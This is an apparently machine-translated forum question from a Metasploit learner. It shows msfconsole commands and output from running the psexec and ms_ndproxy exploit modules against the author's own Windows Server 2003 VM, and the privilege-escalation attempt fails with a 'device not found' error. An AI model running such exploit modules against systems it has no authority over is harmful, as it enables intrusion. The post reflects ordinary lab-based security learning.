Sono nuovo di Kali e Metasploit, studio solo su Internet. Ho installato due macchine virtuali, una è win2003 sp2 x 86 OS, l'altra è Kali 2016.01. Per prima cosa uso exploit / windows / smb / psexec per ottenere una sessione. Succede, e ottengo una sessione, l'ID della sessione è 3. Poiché entrambe le macchine sono le mie macchine virtuali, ottengo la sessione utilizzando l'account amministratore in win2k3. Tralascio i dettagli del messaggio di input e del messaggio di output in Kali. Esamino la sessione per il mio prossimo utilizzo. Quindi provo a usare exploit / windows / local / ms_ndproxy per ulteriori test.
Ecco l'output dettagliato:
msf exploit(psexec) > use exploit/windows/local/ms_ndproxy
msf exploit(ms_ndproxy) > show options
Module options (exploit/windows/local/ms_ndproxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms_ndproxy) > set SESSION 3
SESSION => 3
msf exploit(ms_ndproxy) > show options
Module options (exploit/windows/local/ms_ndproxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms_ndproxy) > exploit
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Detecting the target system...
[*] Running against Windows Server 2003 SP2
[*] Checking device...
[-] Failed to open the \.\NDProxy device (error: 2 ϵͳ�Ҳ���ָ�����ļ���)
[-] Exploit aborted due to failure: no-target: \.\NDProxy device not found
[*] Exploit completed, but no session was created.
Google per un po ', non sono sicuro che il vulns sia corretto o meno sul sistema operativo win2k3. Non ho trovato alcuna informazione utile sull'errore. È un po 'difficile per me controllare il codice sorgente sul codice sorgente degli exploit.
Qualcuno potrebbe aiutarmi a scoprire perché viene visualizzato l'errore?